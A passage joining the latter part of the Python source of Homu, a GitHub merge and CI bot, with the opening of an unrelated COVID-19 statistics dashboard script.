}
)
if 'authzfail' in res.text:
err = 'Authorization failed'
else:
mat = re.search('(?s)<div class="error">(.*?)</div>', res.text)
if mat:
err = mat.group(1).strip()
if not err:
err = 'Unknown error'
else:
err = ''
if err:
state.add_comment(
':bomb: Buildbot returned an error: `{}`'.format(err)
)
elif command.action == 'clean' and realtime:
if not _try_auth_verified():
continue
state.merge_sha = ''
state.init_build_res([])
state.save()
elif command.action == 'ping' and realtime:
if command.ping_type == 'portal':
state.add_comment(
":cake: {}\n\n".format(
random.choice(PORTAL_TURRET_DIALOG),
PORTAL_TURRET_IMAGE)
)
else:
state.add_comment(":sleepy: I'm awake I'm awake")
elif command.action == 'treeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(command.treeclosed_value, command_src)
state.save()
elif command.action == 'untreeclosed':
if not _reviewer_auth_verified():
continue
state.change_treeclosed(-1, None)
state.save()
elif command.action == 'hook':
hook = command.hook_name
hook_cfg = global_cfg['hooks'][hook]
if hook_cfg['realtime'] and not realtime:
continue
if hook_cfg['access'] == "reviewer":
if not _reviewer_auth_verified():
continue
else:
if not _try_auth_verified():
continue
Thread(
target=handle_hook_response,
args=[state, hook_cfg, body, command.hook_extra]
).start()
else:
found = False
if found:
state_changed = True
return state_changed
def handle_hook_response(state, hook_cfg, body, extra_data):
post_data = {}
post_data["pull"] = state.num
post_data["body"] = body
post_data["extra_data"] = extra_data
print(post_data)
response = requests.post(hook_cfg['endpoint'], json=post_data)
print(response.text)
# We only post a response if we're configured to have a response
# non-realtime hooks cannot post
if hook_cfg['has_response'] and hook_cfg['realtime']:
state.add_comment(response.text)
def git_push(git_cmd, branch, state):
merge_sha = subprocess.check_output(git_cmd('rev-parse', 'HEAD')).decode('ascii').strip() # noqa
if utils.silent_call(git_cmd('push', '-f', 'test-origin', branch)):
utils.logged_call(git_cmd('branch', '-f', 'homu-tmp', branch))
utils.logged_call(git_cmd('push', '-f', 'test-origin', 'homu-tmp'))
def inner():
utils.github_create_status(
state.get_repo(),
merge_sha,
'success',
'',
'Branch protection bypassed',
context='homu',
)
def fail(err):
state.add_comment(
':boom: Unable to create a status for {} ({})'
.format(merge_sha, err)
)
utils.retry_until(inner, fail, state)
utils.logged_call(git_cmd('push', '-f', 'test-origin', branch))
return merge_sha
def init_local_git_cmds(repo_cfg, git_cfg):
fpath = os.path.join(git_cfg["cache_dir"], repo_cfg['owner'], repo_cfg['name']) # noqa
genurl = lambda cfg: 'git@github.com:{}/{}.git'.format(cfg['owner'], cfg['name']) # noqa
if not os.path.exists(SSH_KEY_FILE):
os.makedirs(os.path.dirname(SSH_KEY_FILE), exist_ok=True)
with open(SSH_KEY_FILE, 'w') as fp:
fp.write(git_cfg['ssh_key'])
os.chmod(SSH_KEY_FILE, 0o600)
if not os.path.exists(fpath):
print("initialized local git repository at", fpath)
utils.logged_call(['git', 'init', fpath])
remotes = {
'origin': genurl(repo_cfg),
'test-origin': genurl(repo_cfg.get('test-on-fork', repo_cfg)),
}
for remote, url in remotes.items():
try:
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', remote, url]) # noqa
utils.logged_call(['git', '-C', fpath, 'remote', 'set-url', '--push', remote, url]) # noqa
except subprocess.CalledProcessError:
utils.logged_call(['git', '-C', fpath, 'remote', 'add', remote, url]) # noqa
return lambda *args: ['git', '-C', fpath] + list(args)
def branch_equal_to_merge(git_cmd, state, branch):
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return utils.silent_call(git_cmd('diff', '--quiet', 'FETCH_HEAD', branch)) == 0 # noqa
def create_merge(state, repo_cfg, branch, logger, git_cfg,
ensure_merge_equal=False):
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
state.refresh()
lazy_debug(logger,
lambda: "create_merge: attempting merge {} into {} on {!r}"
.format(state.head_sha, branch, state.get_repo()))
merge_msg = 'Auto merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
'<try>' if state.try_ else state.approved_by,
state.title,
state.body)
desc = 'Merge conflict'
comment = (
'This pull request and the master branch diverged in a way that cannot'
' be automatically merged. Please rebase on top of the latest master'
' branch, and let the reviewer approve again.\n'
'\n'
'<details><summary>How do I rebase?</summary>\n\n'
'Assuming `self` is your fork and `upstream` is this repository,'
' you can resolve the conflict following these steps:\n\n'
'1. `git checkout {branch}` *(switch to your branch)*\n'
'2. `git fetch upstream master` *(retrieve the latest master)*\n'
'3. `git rebase upstream/master -p` *(rebase on top of it)*\n'
'4. Follow the on-screen instruction to resolve conflicts'
' (check `git status` if you got lost).\n'
'5. `git push self {branch} --force-with-lease` *(update this PR)*\n\n'
'You may also read'
' [*Git Rebasing to Resolve Conflicts* by Drew Blessing](http://blessing.io/git/git-rebase/open-source/2015/08/23/git-rebasing-to-resolve-conflicts.html)' # noqa
' for a short tutorial.\n\n'
'Please avoid the ["**Resolve conflicts**" button](https://help.github.com/articles/resolving-a-merge-conflict-on-github/) on GitHub.' # noqa
' It uses `git merge` instead of `git rebase` which makes the PR commit' # noqa
' history more difficult to read.\n\n'
'Sometimes step 4 will complete without asking for resolution. This is'
' usually due to difference between how `Cargo.lock` conflict is'
' handled during merge and rebase. This is normal, and you should still' # noqa
' perform step 5 to update this PR.\n\n'
'</details>\n\n'
).format(branch=state.head_ref.split(':', 1)[1])
if git_cfg['local_git']:
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
utils.silent_call(git_cmd('rebase', '--abort'))
utils.silent_call(git_cmd('merge', '--abort'))
if repo_cfg.get('linear', False):
utils.logged_call(
git_cmd('checkout', '-B', branch, state.head_sha))
try:
args = [base_sha]
if repo_cfg.get('autosquash', False):
args += ['-i', '--autosquash']
utils.logged_call(git_cmd('-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
*args))
except subprocess.CalledProcessError:
if repo_cfg.get('autosquash', False):
utils.silent_call(git_cmd('rebase', '--abort'))
if utils.silent_call(git_cmd('rebase', base_sha)) == 0:
desc = 'Auto-squashing failed'
comment = ''
else:
ap = '<try>' if state.try_ else state.approved_by
text = '\nCloses: #{}\nApproved by: {}'.format(state.num, ap)
msg_code = 'cat && echo {}'.format(shlex.quote(text))
env_code = 'export GIT_COMMITTER_NAME={} && export GIT_COMMITTER_EMAIL={} && unset GIT_COMMITTER_DATE'.format(shlex.quote(git_cfg['name']), shlex.quote(git_cfg['email'])) # noqa
utils.logged_call(git_cmd('filter-branch', '-f',
'--msg-filter', msg_code,
'--env-filter', env_code,
'{}..'.format(base_sha)))
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
utils.logged_call(git_cmd(
'checkout',
'-B',
'homu-tmp',
state.head_sha))
ok = True
if repo_cfg.get('autosquash', False):
try:
merge_base_sha = subprocess.check_output(
git_cmd(
'merge-base',
base_sha,
state.head_sha)).decode('ascii').strip()
utils.logged_call(git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'rebase',
'-i',
'--autosquash',
'--onto',
merge_base_sha, base_sha))
except subprocess.CalledProcessError:
desc = 'Auto-squashing failed'
comment = ''
ok = False
if ok:
utils.logged_call(git_cmd('checkout', '-B', branch, base_sha))
try:
subprocess.check_output(
git_cmd(
'-c',
'user.name=' + git_cfg['name'],
'-c',
'user.email=' + git_cfg['email'],
'merge',
'heads/homu-tmp',
'--no-ff',
'-m',
merge_msg),
stderr=subprocess.STDOUT,
universal_newlines=True)
except subprocess.CalledProcessError as e:
comment += '<details><summary>Error message</summary>\n\n```text\n' # noqa
comment += e.output
comment += '\n```\n\n</details>'
pass
else:
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
raise RuntimeError('local_git must be turned on to use this feature') # noqa
# if we're merging using the GitHub API, we have no way to predict
# with certainty what the final result will be so make sure the caller
# isn't asking us to keep any promises (see also discussions at
# https://github.com/servo/homu/pull/57)
assert ensure_merge_equal is False
if branch != state.base_ref:
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
try:
merge_commit = state.get_repo().merge(
branch,
state.head_sha,
merge_msg)
except github3.models.GitHubError as e:
if e.code != 409:
raise
else:
return merge_commit.sha if merge_commit else ''
state.set_status('error')
utils.github_create_status(
state.get_repo(),
state.head_sha,
'error',
'',
desc,
context='homu')
state.add_comment(':lock: {}\n\n{}'.format(desc, comment))
state.change_labels(LabelEvent.CONFLICT)
return ''
def pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
return utils.silent_call(git_cmd('merge-base', '--is-ancestor',
base_sha, state.head_sha)) == 0
# We could fetch this from GitHub instead, but that API is being deprecated:
# https://developer.github.com/changes/2013-04-25-deprecating-merge-commit-sha/
def get_github_merge_sha(state, repo_cfg, git_cfg):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
if state.mergeable is not True:
return None
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return subprocess.check_output(git_cmd('rev-parse', 'FETCH_HEAD')).decode('ascii').strip() # noqa
def do_exemption_merge(state, logger, repo_cfg, git_cfg, url, check_merge,
reason):
try:
merge_sha = create_merge(
state,
repo_cfg,
state.base_ref,
logger,
git_cfg,
check_merge)
except subprocess.CalledProcessError:
print('* Unable to create a merge commit for the exempted PR: {}'.format(state)) # noqa
traceback.print_exc()
return False
if not merge_sha:
return False
desc = 'Test exempted'
state.set_status('success')
utils.github_create_status(state.get_repo(), state.head_sha, 'success',
url, desc, context='homu')
state.add_comment(':zap: {}: {}.'.format(desc, reason))
state.change_labels(LabelEvent.EXEMPTED)
state.merge_sha = merge_sha
state.save()
state.fake_merge(repo_cfg)
return True
def try_travis_exemption(state, logger, repo_cfg, git_cfg):
travis_info = None
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context == 'continuous-integration/travis-ci/pr':
travis_info = info
break
if travis_info is None or travis_info.state != 'success':
return False
mat = re.search('/builds/([0-9]+)$', travis_info.target_url)
if not mat:
return False
url = 'https://api.travis-ci.org/{}/{}/builds/{}'.format(state.owner,
state.name,
mat.group(1))
try:
res = requests.get(url)
except Exception as ex:
print('* Unable to gather build info from Travis CI: {}'.format(ex))
return False
travis_sha = json.loads(res.text)['commit']
travis_commit = state.get_repo().commit(travis_sha)
if not travis_commit:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if (travis_commit.parents[0]['sha'] == base_sha and
travis_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg,
travis_info.target_url, True,
"merge already tested by Travis CI")
return False
def try_status_exemption(state, logger, repo_cfg, git_cfg):
# If all the builders are status-based, then we can do some checks to
# exempt testing under the following cases:
# 1. The PR head commit has the equivalent statuses set to 'success' and
# it is fully rebased on the HEAD of the target base ref.
# 2. The PR head and merge commits have the equivalent statuses set to
# state 'success' and the merge commit's first parent is the HEAD of
# the target base ref.
if not git_cfg['local_git']:
raise RuntimeError('local_git is required to use status exemption')
statuses_all = set()
# equivalence dict: pr context --> auto context
status_equivalences = {}
for key, value in repo_cfg['status'].items():
context = value.get('context')
pr_context = value.get('pr_context', context)
if context is not None:
statuses_all.add(context)
status_equivalences[pr_context] = context
assert len(statuses_all) > 0
# let's first check that all the statuses we want are set to success
statuses_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_pass.add(status_equivalences[info.context])
if statuses_all != statuses_pass:
return False
# is the PR fully rebased?
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', False,
"pull fully rebased and already tested")
# check if we can use the github merge sha as proof
merge_sha = get_github_merge_sha(state, repo_cfg, git_cfg)
if merge_sha is None:
return False
statuses_merge_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), merge_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_merge_pass.add(status_equivalences[info.context])
merge_commit = state.get_repo().commit(merge_sha)
if (statuses_all == statuses_merge_pass and
merge_commit.parents[0]['sha'] == base_sha and
merge_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', True,
"merge already tested")
return False
def start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
if buildbot_slots[0]:
return True
lazy_debug(logger, lambda: "start_build on {!r}".format(state.get_repo()))
pr = state.get_repo().pull_request(state.num)
assert state.head_sha == pr.head.sha
assert state.base_ref == pr.base.ref
repo_cfg = repo_cfgs[state.repo_label]
builders = []
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
can_try_travis_exemption = False
only_status_builders = True
if 'buildbot' in repo_cfg:
if state.try_:
builders += repo_cfg['buildbot']['try_builders']
else:
builders += repo_cfg['buildbot']['builders']
only_status_builders = False
if 'travis' in repo_cfg:
builders += ['travis']
only_status_builders = False
if 'status' in repo_cfg:
found_travis_context = False
for key, value in repo_cfg['status'].items():
context = value.get('context')
if context is not None:
if state.try_ and not value.get('try', True):
# Skip this builder for tries.
continue
builders += ['status-' + key]
# We have an optional fast path if the Travis test passed
# for a given commit and master is unchanged, we can do
# a direct push.
if context == 'continuous-integration/travis-ci/push':
found_travis_context = True
if found_travis_context and len(builders) == 1:
can_try_travis_exemption = True
if 'checks' in repo_cfg:
builders += [
'checks-' + key
for key, value in repo_cfg['checks'].items()
if 'name' in value or (state.try_ and 'try_name' in value)
]
only_status_builders = False
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
lazy_debug(logger, lambda: "start_build: builders={!r}".format(builders))
if (only_status_builders and state.approved_by and
repo_cfg.get('status_based_exemption', False)):
if can_try_travis_exemption:
if try_travis_exemption(state, logger, repo_cfg, git_cfg):
return True
if try_status_exemption(state, logger, repo_cfg, git_cfg):
return True
merge_sha = create_merge(state, repo_cfg, branch, logger, git_cfg)
lazy_debug(logger, lambda: "start_build: merge_sha={}".format(merge_sha))
if not merge_sha:
return False
state.init_build_res(builders)
state.merge_sha = merge_sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
logger.info('Starting build of {}/{}#{} on {}: {}'.format(
state.owner,
state.name,
state.num,
branch,
state.merge_sha))
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
desc = '{} commit {} with merge {}...'.format(
'Trying' if state.try_ else 'Testing',
state.head_sha,
state.merge_sha,
)
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
desc,
context='homu')
if state.try_:
state.add_comment(comments.TryBuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
else:
state.add_comment(comments.BuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
_parents = state.get_repo().commit(state.merge_sha).parents
parent_shas = [x['sha'] for x in _parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(
state.get_repo(),
'tags/homu-tmp',
state.merge_sha,
force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err)) # noqa
return False
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders)) # noqa
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders)) # noqa
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
'{}{}...'.format(msg_1, msg_3),
context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, *args)
def process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db,
git_cfg):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
lazy_debug(logger, lambda: "process_queue: state={!r}, building {}"
.format(state, repo_label))
if state.priority < repo.treeclosed:
continue
if state.status == 'pending' and not state.try_:
break
elif state.status == 'success' and hasattr(state, 'fake_merge_sha'): # noqa
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, buildbot_slots,
logger, db, git_cfg):
return
elif state.status == 'success' and state.try_ and state.approved_by: # noqa
state.try_ = False
state.save()
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
if state.status == 'success':
continue
pull_request = state.get_repo().pull_request(state.num)
if pull_request is None or pull_request.mergeable is None:
time.sleep(5)
pull_request = state.get_repo().pull_request(state.num)
mergeable = pull_request is not None and pull_request.mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat:
issue_or_commit = '#' + mat.group(1)
else:
issue_or_commit = cause['sha']
else:
issue_or_commit = ''
_blame = ''
if issue_or_commit:
_blame = ' (presumably {})'.format(issue_or_commit)
state.add_comment(
':umbrella: The latest upstream changes{} made this '
'pull request unmergeable. Please [resolve the merge conflicts]' # noqa
'(https://rustc-dev-guide.rust-lang.org/git.html#conflicts).\n\n' # noqa
'*Note that reviewers usually do not review pull requests '
'until merge conflicts are resolved!* Once you resolve '
'the conflicts, you should change the labels applied by '
'bors to indicate that your PR is ready for review. '
'Post this as a comment to change the labels:\n'
'```\n'
'@rustbot modify labels: +S-waiting-on-review -S-waiting-on-author\n' # noqa
'```'
.format(_blame)
)
state.change_labels(LabelEvent.CONFLICT)
state.set_mergeable(mergeable, que=False)
except Exception:
print('* Error while fetching mergeability')
traceback.print_exc()
finally:
mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, db, mergeable_que, my_username, repo_labels): # noqa
logger.info('Synchronizing {}...'.format(repo_label))
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
saved_states = {}
for num, state in states[repo_label].items():
saved_states[num] = {
'merge_sha': state.merge_sha,
'build_res': state.build_res,
}
states[repo_label] = {}
repos[repo_label] = Repository(repo, repo_label, db)
for pull in repo.iter_pulls(state='open'):
db_query(
db,
'SELECT status FROM pull WHERE repo = ? AND num = ?',
[repo_label, pull.number])
row = db.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = pull.title
state.body = suppress_pings(pull.body)
state.body = suppress_ignore_block(state.body)
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
sha=comment.original_commit_id,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
saved_state = saved_states.get(pull.number)
if saved_state:
for key, val in saved_state.items():
setattr(state, key, val)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
def process_config(config):
# Replace environment variables
if type(config) == str:
for var in VARIABLES_RE.findall(config):
try:
config = config.replace("${"+var+"}", os.environ[var])
except KeyError:
raise RuntimeError(
f"missing environment variable ${var} "
f"(requested in the configuration file)"
) from None
return config
# Recursively apply the processing
elif type(config) == list:
return [process_config(item) for item in config]
elif type(config) == dict:
return {key: process_config(value) for key, value in config.items()}
# All other values should be returned as-is
else:
return config
def arguments():
parser = argparse.ArgumentParser(
description='A bot that integrates with GitHub and your favorite '
'continuous integration service')
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help='Enable more verbose logging')
parser.add_argument(
'-c',
'--config',
action='store',
help='Path to cfg.toml',
default='cfg.toml')
return parser.parse_args()
def main():
global global_cfg
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
if sys.getfilesystemencoding() == 'ascii':
logger.info('You need to set a locale compatible with unicode or homu will choke on Unicode in PR descriptions/titles. See http://stackoverflow.com/a/27931669') # noqa
try:
with open(args.config) as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
# Fall back to cfg.json only if we're using the defaults
if args.config == 'cfg.toml':
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
else:
raise
cfg = process_config(cfg)
global_cfg = cfg
gh = github3.login(token=cfg['github']['access_token'])
user = gh.user()
cfg_git = cfg.get('git', {})
user_email = cfg_git.get('email')
if user_email is None:
try:
user_email = [x for x in gh.iter_emails() if x['primary']][0]['email'] # noqa
except IndexError:
raise RuntimeError('Primary email not set, or "user" scope not granted') # noqa
user_name = cfg_git.get('name', user.name if user.name else user.login)
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = user.login
repo_labels = {}
mergeable_que = Queue()
git_cfg = {
'name': user_name,
'email': user_email,
'ssh_key': cfg_git.get('ssh_key', ''),
'local_git': cfg_git.get('local_git', False),
'cache_dir': cfg_git.get('cache_dir', 'cache')
}
db_file = cfg.get('db', {}).get('file', 'main.db')
db_conn = sqlite3.connect(db_file,
check_same_thread=False,
isolation_level=None)
db = db_conn.cursor()
db_query(db, '''CREATE TABLE IF NOT EXISTS pull (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
status TEXT NOT NULL,
merge_sha TEXT,
title TEXT,
body TEXT,
head_sha TEXT,
head_ref TEXT,
base_ref TEXT,
assignee TEXT,
approved_by TEXT,
priority INTEGER,
try_ INTEGER,
rollup INTEGER,
delegate TEXT,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS build_res (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
builder TEXT NOT NULL,
res INTEGER,
url TEXT NOT NULL,
merge_sha TEXT NOT NULL,
UNIQUE (repo, num, builder)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS mergeable (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
mergeable INTEGER NOT NULL,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS repos (
repo TEXT NOT NULL,
treeclosed INTEGER NOT NULL,
treeclosed_src TEXT,
UNIQUE (repo)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS retry_log (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
time DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
src TEXT NOT NULL,
msg TEXT NOT NULL
)''')
db_query(db, '''
CREATE INDEX IF NOT EXISTS retry_log_time_index ON retry_log
(repo, time DESC)
''')
# manual DB migration :/
try:
db_query(db, 'SELECT treeclosed_src FROM repos LIMIT 0')
except sqlite3.OperationalError:
db_query(db, 'ALTER TABLE repos ADD COLUMN treeclosed_src TEXT')
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
# If test-on-fork is enabled point both the main repo and the fork to
# the same homu "repository". This will allow events coming from both
# GitHub repositories to be processed the same way.
if 'test-on-fork' in repo_cfg:
tof = repo_cfg['test-on-fork']
repo_labels[tof['owner'], tof['name']] = repo_label
repo_states = {}
repos[repo_label] = Repository(None, repo_label, db)
db_query(
db,
'SELECT num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha FROM pull WHERE repo = ?', # noqa
[repo_label])
for num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate, merge_sha in db.fetchall(): # noqa
state = PullReqState(num, head_sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = rollup
state.delegate = delegate
builders = []
if merge_sha:
if 'buildbot' in repo_cfg:
builders += repo_cfg['buildbot']['builders']
if 'travis' in repo_cfg:
builders += ['travis']
if 'status' in repo_cfg:
builders += ['status-' + key for key, value in repo_cfg['status'].items() if 'context' in value] # noqa
if 'checks' in repo_cfg:
builders += ['checks-' + key for key, value in repo_cfg['checks'].items() if 'name' in value] # noqa
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
db_query(
db,
'SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in db.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res:
raise KeyError
if state.merge_sha != merge_sha:
raise KeyError
except KeyError:
db_query(
db,
'DELETE FROM build_res WHERE repo = ? AND num = ? AND builder = ?', # noqa
[repo_label, num, builder])
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
db_query(db, 'SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in db.fetchall():
try:
state = states[repo_label][num]
except KeyError:
db_query(
db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[repo_label, num])
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
db_query(db, 'SELECT repo FROM pull GROUP BY repo')
for repo_label, in db.fetchall():
if repo_label not in repos:
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg) # noqa
os.environ['GIT_SSH'] = os.path.join(os.path.dirname(__file__), 'git_helper.py') # noqa
os.environ['GIT_EDITOR'] = 'cat'
from . import server
Thread(
target=server.start,
args=[
cfg,
states,
queue_handler,
repo_cfgs,
repos,
logger,
buildbot_slots,
my_username,
db,
repo_labels,
mergeable_que,
gh,
]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
queue_handler()
if __name__ == '__main__':
main()
|
wuhan.py
|
#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
""" Visualize Wuhan Corona Virus Stats """
import datetime as dt
import inspect
import io
import math
import os
import platform
import random
import string
import sys
import threading
import time
import cufflinks as cf
import dash
import dash_core_components as dcc
import dash_html_components as dhc
import flask
import numpy as np
import pandas as pd
import plotly.express as px
import requests
__all__ = ['app', 'server', 'client']
auth_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'auth_key')
if not os.path.exists(auth_file):
with open(auth_file, 'w') as o_f:
o_f.write('\n'.join([(''.join(random.choice(string.ascii_letters) for _ in range(256))) for n in range(256)]))
with open(auth_file) as in_file:
auth_tokens = in_file.readlines()[42:69]
code_link = '/code'
ld_link = '/logs'
ld_file = None
status_link = '/status'
kill_link = '/kill/' + auth_tokens[0]
reload_data_link = '/reload/' + auth_tokens[-1]
app_title = 'Wuhan Corona Virus Pandemic Stats'
# noinspection SpellCheckingInspection
URLS = {
'population': 'https://datahub.io/JohnSnowLabs/population-figures-by-country/r/population-figures-by-country-csv'
'.csv',
'cases': 'https://data.humdata.org/hxlproxy/data/download/time_series_covid19_confirmed_global_narrow.csv?dest'
'=data_edit&filter01=explode&explode-header-att01=date&explode-value-att01=value&filter02=rename&rename'
